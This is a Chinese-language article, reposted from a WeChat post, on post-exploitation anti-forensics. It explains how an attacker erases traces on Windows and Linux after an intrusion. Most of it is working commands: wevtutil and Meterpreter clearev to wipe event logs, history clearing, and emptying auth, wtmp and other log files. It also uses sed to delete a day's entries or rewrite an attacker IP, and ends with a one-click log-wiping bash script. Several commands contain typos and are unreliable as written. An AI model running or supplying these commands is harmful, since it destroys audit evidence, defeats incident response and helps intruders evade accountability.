後滲透階段清理痕跡方式總結[刪除LOG檔案/各種LOG檔案功能 介紹/簡介]

資料來源: https://mp.weixin.qq.com/s/SWMWVezAVzykkjTuRRDxJw

一、前言

    在滲透完成之後，為了減少被發現和追溯的概率，攻擊者有必要清除自己的攻擊痕跡，本文分別對windows和linux上清理痕跡的方式做一個總結。

二、windows

有遠端桌面許可權時手動刪除日誌：

開始-程式-管理工具-電腦管理-系統工具-事件檢視器-清除日誌

wevtutil：

wevtutil cl security    清理安全性記錄檔

meterperter 自帶清除日誌功能：

clearev     清除windows中的應用程式日誌、系統日誌、安全性記錄檔

wevtutil：

wevtutil el             列出系統中所有日誌名稱
wevtutil cl system      清理系統日誌
wevtutil cl application 清理應用程式日誌
wevtutil cl security    清理安全性記錄檔

清除recent：

在文件資源管理器中點擊“查看”->“選項”->在常規->隱私中點擊”清除”按鈕
或直接打開C:\Users\Administrator\Recent並刪除所有內容
或在命令列中輸入del /f /s /q “%userprofile%\Recent*.*

三、linux

清除命令歷史記錄

histroy -r          #刪除當前會話歷史記錄
history -c          #刪除記憶體中的所有命令歷史
rm .bash_history    #刪除歷史檔中的內容
HISTZISE=0          #通過設置歷史命令條數來清除所有歷史記錄

在隱蔽的位置執行命令(使用vim打開檔執行命令)

:set history=0
:!command

linux日誌檔

/var/log/secure 記錄安全相關的日誌資訊 

/var/log/boot.log 記錄守護進程啟動和停止相關的日誌消息

完全刪除日誌檔：

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

linux日誌檔

/var/run/utmp 記錄現在登入的使用者
/var/log/wtmp 記錄使用者所有的登入和登出
/var/log/lastlog 記錄每一個使用者最後登入時間
/var/log/btmp 記錄錯誤的登入嘗試
/var/log/auth.log 需要身份確認的操作
/var/log/secure 記錄安全相關的日誌資訊
/var/log/maillog 記錄郵件相關的日誌資訊
/var/log/message 記錄系統啟動後的資訊和錯誤日誌
/var/log/cron 記錄定時任務相關的日誌資訊
/var/log/spooler 記錄UUCP和news設備相關的日誌資訊
/var/log/boot.log 記錄守護進程啟動和停止相關的日誌消息

針對性刪除日誌檔：

刪除當天日誌

sed  -i '/當天日期/'d  filename

篡改日誌檔：(將所有170.170.64.17ip 替換為127.0.0.1)

sed -i 's/170.170.64.17/127.0.0.1/g'

一鍵清除腳本：

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c